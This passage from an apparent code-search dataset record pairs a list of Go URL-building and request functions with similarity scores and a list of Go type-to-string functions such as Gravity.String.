nil\n\t\t}\n\t\treturn v.RequestUrl\n\t}).(pulumi.StringPtrOutput)\n}", "func (c client) URL() string {\n\treturn c.url\n}", "func (c *client) URL() string {\n\treturn c.rawurl\n}", "func (gar *GetCarrierRequest) URL() string {\n\treturn fmt.Sprintf(`/v1/carriers/%v`, gar.ID)\n}", "func (s *UAA) URL() string {\n\treturn s.server.URL\n}", "func (r *Request) URL() *url.URL {\n\tp := r.pathPrefix\n\tif len(r.resource) != 0 {\n\t\tp = path.Join(p, strings.ToLower(r.resource))\n\t}\n\t// Join trims trailing slashes, so preserve r.pathPrefix's trailing slash\n\t// for backwards compatibility if nothing was changed\n\tif len(r.resourceName) != 0 || len(r.subpath) != 0 || len(r.subresource) != 0 {\n\t\tp = path.Join(p, r.resourceName, r.subresource, r.subpath)\n\t}\n\n\tfinalURL := &url.URL{}\n\tif r.c.base != nil {\n\t\t*finalURL = *r.c.base\n\t}\n\n\tfinalURL.Path = p\n\n\tquery := url.Values{}\n\n\tfor key, values := range r.params {\n\t\tfor _, value := range values {\n\t\t\tquery.Add(key, value)\n\t\t}\n\t}\n\n\t// timeout is handled specially here.\n\tif r.timeout != 0 {\n\t\tquery.Set(\"timeout\", r.timeout.String())\n\t}\n\n\tfinalURL.RawQuery = query.Encode()\n\n\treturn finalURL\n}", "func (r searchReq) URL() string {\n\tu, err := url.Parse(fmt.Sprintf(\"%s/torrents/search/%s\", t411BaseURL, r.Title))\n\tif err != nil {\n\t\tlog.Fatalf(\"Error during construction of t411 search URL: %v\", err)\n\t}\n\tq := u.Query()\n\tif r.Season > 0 {\n\t\tq.Add(fmt.Sprintf(\"term[%d][]\", catSeasonID), fmt.Sprintf(\"%d\", seasonNbrID[r.Season]))\n\t}\n\tif r.Episode > 0 {\n\t\tq.Add(fmt.Sprintf(\"term[%d][]\", catEpisodeID), fmt.Sprintf(\"%d\", episodeNbrID[r.Episode]))\n\t}\n\tif ID, ok := languageMap[r.Language]; ok {\n\t\tq.Add(fmt.Sprintf(\"term[%d][]\", catLanguageID), fmt.Sprintf(\"%d\", ID))\n\n\t}\n\tu.RawQuery = q.Encode()\n\n\treturn u.String()\n}", "func FormURL(baseURL string, method string, params map[string]string) *url.URL {\n\tu, err := url.Parse(baseURL)\n\tif err != nil {\n\t\tlog.Fatalf(\"Failed to set root URL: %s\\n\", err)\n\t}\n\n\tparams[\"method\"] = method\n\tparams[\"format\"] = \"json\"\n\n\tlog.WithField(\"params\", params).Debug(\"got arguments for request\")\n\n\tquery := u.Query()\n\tfor key, value := range params {\n\t\tquery.Set(key, value)\n\t}\n\n\tquery.Set(\"api_sig\", SignRequest(params))\n\n\tu.RawQuery = query.Encode()\n\n\tlog.Debugf(\"creating URL: %s\", u)\n\n\treturn u\n}", "func (r *requestParams) fetchURL() (*http.Response, error) {\n\treq, err := http.NewRequest(\n\t\tr.Method,\n\t\tr.URL,\n\t\tr.Data,\n\t)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif len(r.Contenttype) > 0 {\n\t\treq.Header.Set(\"Content-Type\", r.Contenttype)\n\t}\n\treq.Header.Set(\"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\")\n\tres, _ := r.Client.Do(req)\n\treturn res, nil\n}", "func (r *Request) URL(url string) *Request {\n\tr.url = url\n\treturn r\n}", "func (r *Request) URL(url string) *Request {\n\tr.url = url\n\treturn r\n}", "func (hr HttpRequest) url(r Resource) (string, error) {\n\tslash := \"/\"\n\tpath := r.path\n\tbaseURL := r.protocol + r.baseURL\n\tif hr.overrideBaseURL != \"\" {\n\t\tbaseURL = hr.overrideBaseURL\n\t}\n\tif strings.HasPrefix(path, slash) && strings.HasSuffix(baseURL, slash) {\n\t\tstrings.TrimLeft(path, slash)\n\t} else if !strings.HasPrefix(path, slash) && !strings.HasSuffix(baseURL, slash) {\n\t\tpath = slash + path\n\t}\n\tquery, err := hr.queryString(r)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif query != \"\" {\n\t\treturn baseURL + path + \"?\" + query, nil\n\t}\n\treturn baseURL + path, nil\n}", "func (ctx *HijackRequest) URL() *url.URL {\n\tu, err := url.Parse(ctx.event.Request.URL)\n\tutils.E(err) // no way this will happen, if it happens it's fatal\n\treturn u\n}", "func IncomingRequestURL(r *http.Request) *url.URL {\n\tsource := *r.URL\n\tsource.Host = stringsx.Coalesce(source.Host, r.Header.Get(\"X-Forwarded-Host\"), r.Host)\n\n\tif proto := r.Header.Get(\"X-Forwarded-Proto\"); len(proto) > 0 {\n\t\tsource.Scheme = proto\n\t}\n\n\tif source.Scheme == \"\" {\n\t\tsource.Scheme = \"https\"\n\t\tif r.TLS == nil {\n\t\t\tsource.Scheme = \"http\"\n\t\t}\n\t}\n\n\treturn &source\n}", "func (f *ControlPlane) APIURL() url.URL {\n\treturn f.APIServer.processState.URL\n}", "func RequestURL(rawurl string) bool {\n\turl, err := url.ParseRequestURI(rawurl)\n\tif err != nil {\n\t\treturn false //Couldn't even parse the rawurl\n\t}\n\tif len(url.Scheme) == 0 {\n\t\treturn false //No Scheme found\n\t}\n\treturn true\n}", "func (c *APODClient) buildURL(startDate time.Time) string {\n\tv := url.Values{}\n\tv.Add(\"api_key\", c.APIKey)\n\tv.Add(\"date\", startDate.Format(APODDateFormat))\n\treturn fmt.Sprintf(\"%s?%s\", c.URL, v.Encode())\n}", "func RequestWithURL(task *Task) (io.Reader, error) {\n\treq, err := http.NewRequest(\"GET\", task.Url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tclient := &http.Client{}\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfmt.Println(fmt.Sprintf(\"%s [%d]\", task.Url, resp.StatusCode))\n\ttask.Context.Request = req\n\ttask.Context.Response = resp\n\treturn resp.Body, nil\n}", "func currentURL(req *http.Request, query bool) string {\n\tu := req.URL\n\tif u.Scheme == \"\" {\n\t\tu.Scheme = \"https\"\n\t}\n\tif u.Host == \"\" {\n\t\tu.Host = req.Header.Get(\"Host\")\n\t\tif u.Host == \"\" {\n\t\t\tu.Host = req.Host\n\t\t}\n\t}\n\tif !query {\n\t\treturn strings.Replace(u.String(), \"?\"+u.RawQuery, \"\", 1)\n\t}\n\n\treturn u.String()\n}", "func (f Fetcher) printURL() {\n\tu := f.resp.Request.URL\n\tfmt.Printf(\"Site: %s\\n\", u)\n}", "func (c *Client) URL() (url string) {\n\turl = c.url // + \"/\" + c.version\n\treturn\n}", "func (golr *GetOSListRequest) URL() string {\n\turi := `/v1/os/`\n\n\tu := url.URL{}\n\tif golr.Page > 0 {\n\t\tu.Query().Add(\"page\", strconv.Itoa(golr.Page))\n\t}\n\tif golr.Size > 0 {\n\t\tu.Query().Add(\"size\", strconv.Itoa(golr.Size))\n\t}\n\n\tif golr.Page > 0 || golr.Size > 0 {\n\t\treturn fmt.Sprintf(\"%s?%s\", uri, u.Query().Encode())\n\t}\n\n\treturn uri\n}", "func (r CreateRequest) URL() string {\n\treturn \"v3/campaigns\"\n}", "func (c *Client) URL() string {\n\treturn c.url\n}", "func buildApiURL(sig, protocol string) string {\n\treturn protocol + API_HOST + API_ENDPOIT + SIG_GET_KEY + sig\n}", "func MakeSCRequestUrl(scIP string, api_parts ...string) string {\n\tvar full_url bytes.Buffer\n\n\tfull_url.WriteString(\"http://\" + scIP + url.Base() + url.Device() + url.Management())\n\tfor _, api_part := range api_parts {\n\t\tfull_url.WriteString(api_part)\n\t}\n\n\tlogger.Logging(logger.DEBUG, full_url.String())\n\treturn full_url.String()\n}", "func (d *TestDex) URL() string {\n\treturn d.webServer.URL\n}", "func (translator *youdaoTranslator) genRequestURL(text, timestamp, salt string) string {\n\tquery := map[string]string{\n\t\t\"q\": text,\n\t\t\"appKey\": translator.appKey,\n\t\t\"salt\": salt,\n\t\t\"signType\": \"v3\",\n\t\t\"curtime\": timestamp,\n\t}\n\tif textContainChinese(text) {\n\t\tquery[\"from\"] = \"zh-CHS\"\n\t\tquery[\"to\"] = \"en\"\n\t} else {\n\t\tquery[\"to\"] = \"zh-CHS\"\n\t\tquery[\"from\"] = \"en\"\n\t}\n\tinput := translator.appKey + genInput(text) + salt + timestamp + translator.appSecret\n\thash := sha256.New()\n\thash.Write([]byte(input))\n\tquery[\"sign\"] = fmt.Sprintf(\"%x\", hash.Sum(nil)) // 16 进制\n\n\tu, _ := url.Parse(youdaoURL)\n\tq := u.Query()\n\tfor k, v := range query {\n\t\tq.Set(k, v)\n\t}\n\tu.RawQuery = q.Encode()\n\treturn u.String()\n}", "func (op OperationRequest) BuildURL() (endpoint string, err error) {\n\tnParams := countParams(op.ForAccount, op.ForLedger, op.ForLiquidityPool, op.forOperationID, op.ForTransaction)\n\n\tif nParams > 1 {\n\t\treturn endpoint, errors.New(\"invalid request: too many parameters\")\n\t}\n\n\tif op.endpoint == \"\" {\n\t\treturn endpoint, errors.New(\"internal error, endpoint not set\")\n\t}\n\n\tendpoint = op.endpoint\n\tif op.ForAccount != \"\" {\n\t\tendpoint = fmt.Sprintf(\"accounts/%s/%s\", op.ForAccount, op.endpoint)\n\t}\n\tif op.ForClaimableBalance != \"\" {\n\t\tendpoint = fmt.Sprintf(\"claimable_balances/%s/%s\", op.ForClaimableBalance, op.endpoint)\n\t}\n\tif op.ForLedger > 0 {\n\t\tendpoint = fmt.Sprintf(\"ledgers/%d/%s\", op.ForLedger, op.endpoint)\n\t}\n\tif op.ForLiquidityPool != \"\" {\n\t\tendpoint = fmt.Sprintf(\"liquidity_pools/%s/%s\", op.ForLiquidityPool, op.endpoint)\n\t}\n\tif op.forOperationID != \"\" {\n\t\tendpoint = fmt.Sprintf(\"operations/%s\", op.forOperationID)\n\t}\n\tif op.ForTransaction != \"\" {\n\t\tendpoint = fmt.Sprintf(\"transactions/%s/%s\", op.ForTransaction, op.endpoint)\n\t}\n\n\tqueryParams := addQueryParams(cursor(op.Cursor), limit(op.Limit), op.Order,\n\t\tincludeFailed(op.IncludeFailed), join(op.Join))\n\tif queryParams != \"\" {\n\t\tendpoint = fmt.Sprintf(\"%s?%s\", endpoint, queryParams)\n\t}\n\n\t_, err = url.Parse(endpoint)\n\tif err != nil {\n\t\terr = errors.Wrap(err, \"failed to parse endpoint\")\n\t}\n\n\treturn endpoint, err\n}", "func ValidateURL(baseURL, apiURL string) string {\n\n\tcmpltURL := baseURL + apiURL\n\n\tu, err := url.ParseRequestURI(cmpltURL)\n\tif err != nil {\n\t\tlog.Fatalf(\"AlertManager API URL is not valid, error:%v\", err)\n\t}\n\n\treturn u.String()\n}", "func craeteRequest(url string) (*http.Request, error) {\n\treq, err := http.NewRequest(\"GET\", url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn req, err\n}", "func (a *API) GetEndpointURL() string {\n\tif a.Sandbox {\n\t\treturn \"https://apitest.authorize.net/xml/v1/request.api\"\n\t}\n\treturn \"https://api.authorize.net/xml/v1/request.api\"\n}", "func (args *HTTPArgs) SetRequestURL() (err error) {\n\tif args.URL == \"\" {\n\t\terr = fmt.Errorf(\"url not found: %v\", args.URL)\n\t\treturn\n\t}\n\turlValues := url.Values{}\n\tfor key, value := range args.Values {\n\t\turlValues.Add(key, value)\n\t}\n\n\turlArgs := urlValues.Encode()\n\targs.URL = fmt.Sprintf(\"%s?%s\", args.URL, urlArgs)\n\treturn\n}", "func (enc *Enqueuer) RequestPath() string {\n\treturn enc.host + server.BuildRoute\n}", "func (r *Response) URL() string {\n\treturn r.host + \"/convert/p3r68-cdx67/\" + r.Filename\n}", "func (h *Handler) LogRequestURL(r *http.Request) {\n\tif h.Logger != nil {\n\t\th.Logger.Info(h.GetQualifiedName(), zap.String(\"URL Path\", r.URL.Path))\n\t}\n}", "func (r ReqArticles) SerializeUrl() string {\n\treturn r.baseUrl + \"everything?q=\" + r.q\n}", "func (r *Request) URL(uri string) *Request {\n\tr.URLStruct, r.Error = url.Parse(uri)\n\treturn r\n}", "func URL(r *http.Request, data interface{}) error {\n\tq := r.URL.Query()\n\tv := reflect.ValueOf(data)\n\tt := v.Elem().Type()\n\tfor i := 0; i < v.Elem().NumField(); i++ {\n\t\tft := t.Field(i)\n\t\tfv := v.Elem().Field(i)\n\t\tif tv, exist := ft.Tag.Lookup(paramTag); exist {\n\t\t\tval := fmt.Sprintf(\"%v\", fv)\n\t\t\tif !(len(val) == 0 && strings.Contains(tv, omitEmpty)) {\n\t\t\t\tq.Add(strings.SplitN(tv, \",\", 2)[0], val)\n\t\t\t}\n\t\t}\n\t}\n\tr.URL.RawQuery = q.Encode()\n\treturn nil\n}", "func uri(r *http.Request) string {\n\tif r.URL.Host != \"\" {\n\t\treturn r.URL.String()\n\t}\n\tif r.TLS != nil {\n\t\treturn fmt.Sprintf(\"https://%s%s\", r.Host, r.URL.String())\n\t}\n\n\treturn fmt.Sprintf(\"http://%s%s\", r.Host, r.URL.String())\n}", "func (m *Command) URL() string { return m.API.Node().URI.String() }", "func (client *BaseClient) URL() *url.URL {\n\treturn client.url\n}", "func GetURL(context *gin.Context) {\n\tvar apiRequest models.SearchRequest\n\tif err := context.BindJSON(&apiRequest); err != nil {\n\t\tutil.ErrorResponder(err, GetUrl, util.FailureDesc, util.BindingFailedMsg, http.StatusBadRequest, context)\n\t\treturn\n\t}\n\tes := se.GetESInstance()\n\terr, url := es.GetURL(apiRequest.Text)\n\tif err != nil {\n\t\tutil.ErrorResponder(err, GetUrl, util.FailureDesc, err.Error(), http.StatusInternalServerError, context)\n\t\treturn\n\t}\n\tcontext.JSON(http.StatusOK, models.SearchResponse{\n\t\tStatus: util.SetStatusResponse(http.StatusOK,\n\t\t\thttp.StatusText(http.StatusOK),\n\t\t\t\"URL fetched\"),\n\t\tURL: url,\n\t})\n}", "func (c *Client) URL() string {\n\tu := url.URL{Scheme: \"http\", Host: c.host, Path: c.path}\n\treturn u.String()\n}", "func (w *worker) requestURL(ctx *URLContext, headRequest bool) {\n\tif res, ok := w.fetchURL(ctx, w.opts.UserAgent, headRequest); ok {\n\t\tvar harvested interface{}\n\t\tvar visited bool\n\n\t\t// Close the body on function end\n\t\tdefer res.Body.Close()\n\n\t\t// Any 2xx status code is good to go\n\t\tif res.StatusCode >= 200 && res.StatusCode < 300 {\n\t\t\t// Success, visit the URL\n\t\t\tharvested = w.visitURL(ctx, res)\n\t\t\tvisited = true\n\t\t} else {\n\t\t\t// Error based on status code received\n\t\t\tw.opts.Extender.Error(newCrawlErrorMessage(ctx, res.Status, CekHttpStatusCode))\n\t\t\tw.logFunc(LogError, \"ERROR status code for %s: %s\", ctx.url, res.Status)\n\t\t}\n\t\tw.sendResponse(ctx, visited, harvested, false)\n\t}\n}", "func (e *Endpoint) URL() string {\n\treturn e.url\n}", "func (o *LoginRequest) GetRequestUrl() string {\n\tif o == nil || o.RequestUrl == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.RequestUrl\n}", "func (a Auth) URL() string {\n\tu := url.URL{}\n\tu.Host = oauthHost\n\tu.Scheme = oauthScheme\n\tu.Path = oauthPath\n\n\tif len(a.RedirectURI) == 0 {\n\t\ta.RedirectURI = oauthRedirectURI\n\t}\n\tif len(a.ResponseType) == 0 {\n\t\ta.ResponseType = oauthResponseType\n\t}\n\tif len(a.Display) == 0 {\n\t\ta.Display = oauthDisplay\n\t}\n\n\tvalues := u.Query()\n\tvalues.Add(paramResponseType, a.ResponseType)\n\tvalues.Add(paramScope, a.Scope.String())\n\tvalues.Add(paramAppID, int64s(a.ID))\n\tvalues.Add(paramRedirectURI, a.RedirectURI)\n\tvalues.Add(paramVersion, defaultVersion)\n\tvalues.Add(paramDisplay, a.Display)\n\tu.RawQuery = values.Encode()\n\n\treturn u.String()\n}", "func (w *Worker) Url(path string, params url.Values) string {\n\t// random choice one host for load balance\n\ti := rand.Intn(len(w.ctx.addrs))\n\taddr := w.ctx.addrs[i]\n\ts := fmt.Sprintf(\"http://%s%s\", addr, path)\n\tif params == nil {\n\t\treturn s\n\t}\n\tp := params.Encode()\n\treturn fmt.Sprintf(\"%s?%s\", s, p)\n}", "func (u exampleRemoteData) GetURL() string {\n\treturn \"https://randomuser.me/api/\"\n}", "func GetURL(endpoint string) string {\n\n\t// Concatenate and return the API URL, version, and endpoint path.\n\treturn fmt.Sprintf(\"%s/%s/%s\", apiURL, apiVersion, endpoint)\n}", "func (p *FileInf) getURL() (*url.URL, error) {\n\tu, err := url.Parse(driveapiurl)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tu.Path = path.Join(u.Path, p.PermissionInfo.FileID)\n\tu.Path = path.Join(u.Path, \"permissions\")\n\treturn u, nil\n}", "func CreateRequestURL(address string, endpointPath string) string {\n\tforwardSlash := \"/\"\n\tif strings.HasSuffix(address, forwardSlash) {\n\t\taddress = strings.TrimSuffix(address, forwardSlash)\n\t}\n\tif strings.HasPrefix(endpointPath, forwardSlash) {\n\t\tendpointPath = strings.TrimPrefix(endpointPath, forwardSlash)\n\t}\n\treturn address + forwardSlash + endpointPath\n}", "func (c *ContainerClient) URL() string {\n\treturn c.client.endpoint\n}", "func (opa *client) getURL(path string) string {\n\treturn fmt.Sprintf(\"%s/%s\", opa.Host, path)\n}", "func (ep *Endpoint) URL() (string, error) {\n\tbaseURL, err := deploys.GetDownloadURL(ep.Version)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\treturn baseURL + \"/\" + ep.Resource + \".json\", nil\n}", "func APIEndpoint(sandbox bool) string {\n\tif sandbox {\n\t\treturn SandboxURL\n\t}\n\treturn APIURL\n}", "func (m RequestURL) GetBaseURL() string {\n\tif uri := m.r.Header.Get(\"REQUEST_URI\"); uri != \"\" {\n\t\treturn uri\n\t}\n\n\treturn fmt.Sprintf(\"https://localhost:%d\", m.Port)\n}", "func (g *GitLab) URL() string {\n\treturn g.url\n}", "func (config *Config) evaluateAPIEndpointURL() error {\n\tlog.Debug(\"evaluateAPIEndpointURL\")\n\n\t// remove ending slash if exist\n\tconfig.APIEndpoint = strings.TrimRight(config.APIEndpoint, \"/\")\n\n\t// In User mode, endpoint url should include API version\n\tif !config.IsAgentMode() {\n\t\tcURL, err := url.Parse(config.APIEndpoint)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif cURL.Path == \"\" {\n\t\t\tconfig.APIEndpoint = strings.Join([]string{config.APIEndpoint, VERSION_API_USER_MODE}, \"/\")\n\t\t\tlog.Warnf(\"Defined API server endpoint url does not include API version. Normalized to latest version (%s): %s\", VERSION_API_USER_MODE, config.APIEndpoint)\n\t\t} else if cURL.Path != strings.Join([]string{\"/\", VERSION_API_USER_MODE}, \"\") {\n\t\t\tlog.Warnf(\"Defined API server endpoint url does not match the latest supported API version (%s). Found %s\", VERSION_API_USER_MODE, cURL.Path)\n\t\t}\n\t}\n\n\treturn nil\n}", "func (p *Base) URL() string {\n\treturn \"https://thebase.in\"\n}", "func (s *Server) GetAPIURL() string {\n\treturn \"http://\" + s.ServerAddr + \"/\"\n}", "func (m *Main) URL() string { return \"http://\" + m.Server.Addr().String() }", "func URLKey(r *http.Request) string {\n\tadminPrefix := \"admin!!\"\n\tkey := strings.TrimPrefix(r.URL.String(), adminPrefix) // prevents attach with fake url to get admin view\n\tif user, err := rest.GetUserInfo(r); err == nil && user.Admin { // make separate cache key for admins\n\t\tkey = adminPrefix + key\n\t}\n\treturn key\n}", "func (cbr ClaimableBalanceRequest) BuildURL() (endpoint string, err error) {\n\tendpoint = \"claimable_balances\"\n\n\t//max limit is 200\n\tif cbr.Limit > 200 {\n\t\treturn endpoint, errors.New(\"invalid request: limit \" + fmt.Sprint(cbr.Limit) + \" is greater than limit max of 200\")\n\t}\n\n\t// Only one filter parameter is allowed, and you can't mix an ID query and\n\t// filters.\n\tnParams := countParams(cbr.Asset, cbr.Claimant, cbr.Sponsor, cbr.ID)\n\tif cbr.ID != \"\" && nParams > 1 {\n\t\treturn endpoint, errors.New(\"invalid request: too many parameters\")\n\t}\n\n\tif cbr.ID != \"\" {\n\t\tendpoint = fmt.Sprintf(\"%s/%s\", endpoint, cbr.ID)\n\t} else {\n\t\tparams := map[string]string{\n\t\t\t\"claimant\": cbr.Claimant,\n\t\t\t\"sponsor\": cbr.Sponsor,\n\t\t\t\"asset\": cbr.Asset,\n\t\t}\n\t\tqueryParams := addQueryParams(\n\t\t\tparams, limit(cbr.Limit), cursor(cbr.Cursor),\n\t\t)\n\t\tendpoint = fmt.Sprintf(\"%s?%s\", endpoint, queryParams)\n\t}\n\n\t_, err = url.Parse(endpoint)\n\tif err != nil {\n\t\terr = errors.Wrap(err, \"failed to parse endpoint\")\n\t}\n\n\treturn endpoint, err\n}", "func (api *GeocodingAPI) buildURL(req *QueryByAddressRequest) (string, error) {\n\tu, err := url.Parse(fmt.Sprintf(\"%s/geocode/%s/%s.json\",\n\t\tapi.c.BaseURL(),\n\t\turl.QueryEscape(req.Index),\n\t\turl.QueryEscape(req.Query)))\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\t// Add access_token as query string parameter\n\tq := u.Query()\n\tq.Set(\"access_token\", api.c.accessToken)\n\tu.RawQuery = q.Encode()\n\treturn u.String(), nil\n}", "func getUrl(basicUrl string, apiKey string, ticker string) string {\n\turlWithTicker := strings.Replace(basicUrl, \"__SYMBOL__\", ticker, 1)\n\turlWithKey := strings.Replace(urlWithTicker, \"__APIKEY__\", apiKey, 1)\n\n\treturn urlWithKey\n}", "func (c *Client) URL(path string, a ...interface{}) string {\n\tu, _ := urlx.Parse(c.addr)\n\n\tu.Path = fmt.Sprintf(path, a...)\n\n\treturn u.String()\n}", "func (cli *Client) URL() string {\n\treturn cli.ref.Get(\"url\").String()\n}", "func (o *OAuth2ConsentRequest) GetRequestUrl() string {\n\tif o == nil || o.RequestUrl == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.RequestUrl\n}", "func fetchURL(request *http.Request) (string, error) {\n\tcontents, err := fetchBytesFromURL(request)\n\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"could not fetch url %v. Response error %v\", request.URL, err)\n\t}\n\n\treturn string(contents), nil\n}" ]
[ "0.7411503", "0.7096094", "0.69609356", "0.69446814", "0.6881344", "0.6879621", "0.6851136", "0.67948085", "0.67459786", "0.6742427", "0.6733375", "0.6697937", "0.6690277", "0.6583074", "0.6574944", "0.6560711", "0.65330136", "0.6517402", "0.6466087", "0.6459057", "0.6413217", "0.64082617", "0.63042355", "0.62923485", "0.62736464", "0.62672085", "0.62597215", "0.6253978", "0.6247699", "0.6226214", "0.6222892", "0.62194455", "0.6208312", "0.6205046", "0.6202393", "0.61997795", "0.61517584", "0.6149523", "0.61354154", "0.6128628", "0.6128628", "0.6128618", "0.6114754", "0.6111913", "0.61006415", "0.6100571", "0.608921", "0.6071857", "0.6039475", "0.6039379", "0.6038784", "0.60266745", "0.6004515", "0.5996821", "0.59903115", "0.59805685", "0.59775674", "0.5963628", "0.59554183", "0.59380996", "0.592984", "0.5927408", "0.59256613", "0.5923797", "0.59197676", "0.5913298", "0.589243", "0.58892876", "0.5888847", "0.5887018", "0.5872711", "0.58679086", "0.58676773", "0.5853337", "0.58446664", "0.5826406", "0.5826227", "0.58202034", "0.5816178", "0.58093363", "0.5804038", "0.58018833", "0.57945716", "0.5792989", "0.5792189", "0.5788759", "0.57858163", "0.57849747", "0.5780398", "0.5773633", "0.577143", "0.57560295", "0.57410693", "0.57326025", "0.57249475", "0.57181686", "0.57133406", "0.5708464", "0.57065374", "0.5704338", "0.5693914" ]
0.0
-1
Function to convert a gravity to a string. Returns an empty string if the gravity type is unknown (or invalid)
func (g *Gravity) String() string { // Iterate over the gravity types for name, gravity := range GravityTypes { // If the horizontal and vertical gravity is a match if g.HorizGravity == gravity.HorizGravity && g.VertGravity == gravity.VertGravity { return name } } // Otherwise return an empty string return "" }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (c CurveType) String() string {\n\tswitch c {\n\tcase Hilbert:\n\t\treturn \"Hilbert\"\n\tcase Morton:\n\t\treturn \"Morton\"\n\t}\n\treturn \"\"\n}", "func (o SpaceInformationType) String() string {\n\treturn ToString(reflect.ValueOf(o))\n}", "func (me Tangle360Type) String() string { return xsdt.Double(me).String() }", "func (t *Type) String() string {\n\tif t.Precision != nil && t.Scale != nil {\n\t\treturn fmt.Sprintf(\"%s(%s,%s)\", t.Name.Name, t.Precision.String(), t.Scale.String())\n\t} else if t.Precision != nil {\n\t\treturn fmt.Sprintf(\"%s(%s)\", t.Name.Name, t.Precision.String())\n\t} else if t.Scale != nil {\n\t\t// I'm not sure how you're supposed to tell this from the t.Precision case.\n\t\treturn fmt.Sprintf(\"%s(%s)\", t.Name.Name, t.Scale.String())\n\t}\n\treturn t.Name.Name\n}", "func (t KnownBuildType) String() string {\n\treturn string(t)\n}", "func (me Tangle90Type) String() string { return xsdt.Double(me).String() }", "func (t FillType) String() string {\n\treturn fromFillType[t]\n}", "func (dw *DrawingWand) GetGravity() GravityType {\n\treturn GravityType(C.MagickDrawGetGravity(dw.dw))\n}", "func (f ApproximationType) String() string {\n\n\tif f < approximationTypeEnd {\n\t\treturn approximationTypeLookup[f]\n\t}\n\n\treturn \"\"\n}", "func (r FloatBoundedStrictly) String() string { return FloatBounded(r).String() }", "func (t Type) String() string {\n\tswitch t {\n\tcase Immutable:\n\t\treturn \"IMMUTABLE\"\n\tcase Temporal:\n\t\treturn \"TEMPORAL\"\n\tdefault:\n\t\treturn \"UNKNOWN\"\n\t}\n}", "func (me Tangle180Type) String() string { return xsdt.Double(me).String() }", "func (t Type) String() string {\n\tswitch t {\n\tdefault:\n\t\treturn \"Unknown\"\n\tcase '+':\n\t\treturn \"SimpleString\"\n\tcase '-':\n\t\treturn \"Error\"\n\tcase ':':\n\t\treturn \"Integer\"\n\tcase '$':\n\t\treturn \"BulkString\"\n\tcase '*':\n\t\treturn \"Array\"\n\tcase 'R':\n\t\treturn \"RDB\"\n\t}\n}", "func (rt ReleaseType) String() string {\n\tswitch rt {\n\tcase ReleaseTypeError:\n\t\t// Developer error. Panic as we can't call Critical here.\n\t\tpanic(\"uninitialized release type\")\n\tcase Release:\n\t\treturn \"release\"\n\tcase Dev:\n\t\treturn \"dev\"\n\tcase Testing:\n\t\treturn \"testing\"\n\tdefault:\n\t\t// Developer error. Panic as we can't call Critical here.\n\t\tpanic(\"unknown release type\")\n\t}\n}", "func (me Tanglepos180Type) String() string { return xsdt.Double(me).String() }", "func (me TFontFamilyValueType) String() string { return xsdt.String(me).String() }", "func (t Type) String() string {\n\tswitch t {\n\tcase UNKNOWN:\n\t\treturn \"unknown\"\n\tcase STRING:\n\t\treturn \"string\"\n\tcase BOOLEAN:\n\t\treturn \"boolean\"\n\tcase NUMBER:\n\t\treturn \"number\"\n\tcase DATE:\n\t\treturn \"date\"\n\tcase TIME:\n\t\treturn \"time\"\n\tcase DATETIME:\n\t\treturn \"datetime\"\n\tcase LOCATION:\n\t\treturn \"location\"\n\tcase ADDRESS:\n\t\treturn \"address\"\n\t}\n\treturn \"unsupported\"\n}", "func (v *Variant) TypeString() string {\n\t// the string returned from this belongs to GVariant and must not be freed.\n\treturn C.GoString((*C.char)(C.g_variant_get_type_string(v.native())))\n}", "func toFullString(f float64) string {\n\treturn strconv.FormatFloat(f, 'g', 6, 64)\n}", "func (me TSAFPTtextTypeMandatoryMax90Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (me TFontFamilyValueType) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (g Grade) String() string {\n\tswitch g {\n\tcase Bad:\n\t\treturn \"Bad\"\n\tcase Legacy:\n\t\treturn \"Legacy\"\n\tcase Good:\n\t\treturn \"Good\"\n\tcase Skipped:\n\t\treturn \"Skipped\"\n\tdefault:\n\t\treturn \"Invalid\"\n\t}\n}", "func ParseGravity(value string, def Gravity) (Gravity, error) {\n\t// Convert the string to lowercase\n\tvalue = strings.ToLower(value)\n\t// If the value isn't given, use the default\n\tif value == \"\" {\n\t\treturn def, nil\n\t}\n\t// Try to get the gravity type from the map\n\tgravity, ok := GravityTypes[value]\n\tif ok {\n\t\treturn gravity, nil\n\t} else {\n\t\treturn Gravity{}, errors.New(\"invalid gravity '\" + value + \"'\")\n\t}\n}", "func (me TPositiveFloatType) String() string { return xsdt.Float(me).String() }", "func getStringFromGivenType(v interface{}) string {\n\tvar str string\n\tswitch v.(type) {\n\tcase int:\n\t\tstr = strconv.Itoa(v.(int))\n\tcase int64:\n\t\tstr = strconv.FormatInt(v.(int64), 10)\n\tcase string:\n\t\tstr, _ = v.(string)\n\tcase decimal.Decimal:\n\t\tstr = v.(decimal.Decimal).String()\n\tdefault:\n\t\tstr = \"\"\n\t}\n\treturn str\n}", "func (t Type) String() string {\n\tswitch t {\n\tcase Int32:\n\t\treturn \"int32\"\n\tcase Int64:\n\t\treturn \"int64\"\n\tcase Float64:\n\t\treturn \"float64\"\n\tcase String:\n\t\treturn \"string\"\n\tcase Bool:\n\t\treturn \"bool\"\n\tcase Timestamp:\n\t\treturn \"timestamp\"\n\tcase JSON:\n\t\treturn \"json\"\n\tdefault:\n\t\treturn \"unsupported\"\n\t}\n}", "func (me TSAFPTtextTypeMandatoryMax210Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (me TSAFPTtextTypeMandatoryMax70Car) ToXsdtString() xsdt.String { return xsdt.String(me) }", "func (dt DataType) String() string {\n\tswitch dt {\n\tcase DSA:\n\t\treturn \"DSA\"\n\tcase DFA:\n\t\treturn \"DFA\"\n\tcase DDA:\n\t\treturn 